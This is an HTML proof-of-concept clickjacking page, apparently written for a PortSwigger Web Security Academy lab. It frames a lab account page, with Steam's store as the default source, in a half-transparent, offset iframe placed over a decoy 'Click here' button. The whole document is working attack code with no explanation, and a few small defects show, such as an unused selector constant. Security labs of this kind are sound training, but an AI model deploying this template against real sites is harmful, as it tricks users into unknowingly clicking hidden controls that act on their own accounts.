<html>
<head>
<title>poc</title>
        <style type="text/css"><!--
            *{
                margin:0;
                padding:0;
            }
            body {  
                background:#ffffff;
            }
            .button
            {
                padding:5px;
                background:#6699CC;
                left:275px;
                width:120px;
                border: 1px solid #336699;
            }
            #content {
                width: 500px;
                height: 500px;
                margin-top: 150px ;
                margin-left: 500px;
            }
            #clickjacking
            {
                position: absolute;
                left: 172px;
                top: 60px;
                filter: alpha(opacity=0.5);
                opacity:0.5
            }
        //--></style>
<script>
const url= 'https://ac9b1fdd1f1b9081c089486800f30030.web-security-academy.net/my-account'
const selector=  '#follow'
const xoffset= 600
const yoffset= -300
const buttonX = 50
const buttonY =50


	</script>
</head>
<body>
<p>Website is vulnerable to KLIKjacking!</p>
        <div id="content">
            <h1>Click here</h1>
            <form>
                <input id='doit' type="submit" class="button" value="TRY">
            </form>
        </div>

<iframe id="clickjacking" src="https://store.steampowered.com/" scrolling="no" frameborder="none" width="500" height="500"></iframe>
<script>

let target = document.getElementsByTagName('iframe')[0];
let button = document.querySelector('#doit')
target.setAttribute('src',url)
target.style.left = xoffset + 'px';
target.style.top = yoffset + 'px';
button.style.left = buttonX
button.style.top = buttonY
</script>
</body>
</html>